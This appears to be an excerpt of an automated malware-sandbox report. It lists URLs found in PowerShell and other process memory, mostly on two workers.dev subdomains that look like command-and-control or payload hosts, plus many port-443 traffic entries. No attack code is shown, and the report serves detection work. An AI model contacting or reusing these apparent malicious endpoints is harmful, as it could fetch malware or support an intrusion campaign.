Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//v6D/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vZuD1ACM/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vZuD1ACM/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vhJnluKFMptEgOR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//vhqg/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//wdVAkkA5AdZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//yTtsOart/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.devp
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F589000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F530000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: gpg.exe, 0000000C.00000002.998959176.000000006B4A8000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: https://gnu.org/licenses/
Source: gpg.exe, 0000000C.00000002.998959176.000000006B4A8000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: https://gnu.org/licenses/gpl.html
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.html
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.htmlWARNING:
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr | String found in binary or memory: https://gnupg.org0/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE1B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev
Source: powershell.exe, 00000017.00000002.3440402672.000001E9651D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287468346.000001F64F19E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000002.1292787449.000001F64F19F000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287597532.000001F64F17D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287468346.000001F64F18E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1290506232.000001F64F32B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287677733.000001F64F18E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//05VQDj/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//0TncPv/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//0pm/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1IeCk7PM1e6EFs/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1OCL4oe/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//1a/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2DEJE/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2THa/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//2alG/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//4moV81QFVf4niY/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D6DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//4pEWMhVbtH/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//5y7EiJZ/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//631bV48k5KgqLFn/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D389000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//6d3I64Tc/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//7hTVpmwz1kj8/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//A8nFm8Gv/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//AwSQ/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//BL/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//C/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//CGC/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//CItVBBJOLtu/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//CMKN5HtX3V/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//D1Q/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//DLFGQvYKJVtdP4G/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//Dxwg1JfgqWkuFq/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//EQWYAlV/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//F/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//FhMc87yGr/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//FvFOLB5YT/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//GGcWYsMgU3pk/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//GX/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//GjzoFJJ/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//HuPiwBjC61do/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//J2ZkX/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//JXTwgXBNb4tN/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//L/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D362000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//L/thLDydJ8di7m/curred
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//NYJbOyn/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//Nqz2krqn3/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//PdLa/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//QFbqYvl1dTq/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//QO6crhMKJE/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//RKvJvjWY7vk0u/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//RKy/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//RxgVHEhA/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//SP/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//T/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//TLK/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//U7/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//Uzt6/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//XEQc4ht0Zzni/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//XF0U/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//XtBpJSJd/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//c/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//dFxW/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//e/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//e1thLDydJ8di7m/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//evgJI6c/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//f7Un5/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//gjxShsoGWEdb/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//i3/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//iQWanS1L/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//ipk0pnk/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//kH40oiK3Cj1gLJ/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//kpuaK8G/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//ooSEAXY/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//p/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D31C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//r1ktGyxItd20gg/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D31C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//r1ktGyxItd20gg/X
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D31C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//r1ktGyxItd20gg/p
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//rDihrnAW/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//rkWvS7BVXhvOB/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D3E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//se/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//sr/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//tmY2VG7/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//v80gLyf/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//vDk/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//vqTIrZxkFZl/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev//yI/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94CEE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.dev/x
Source: powershell.exe, 00000017.00000002.3346373467.000001E94CEE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.workers.x
Source: powershell.exe, 00000017.00000002.3346373467.000001E94CEE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo2460.worx
Source: powershell.exe, 00000017.00000002.3346373467.000001E94CEE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxivo246x
Source: powershell.exe, 00000017.00000002.3346373467.000001E94CEE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nginx-server.paxix
Source: powershell.exe, 00000017.00000002.3410839615.000001E95C5F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.robware.net/about
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
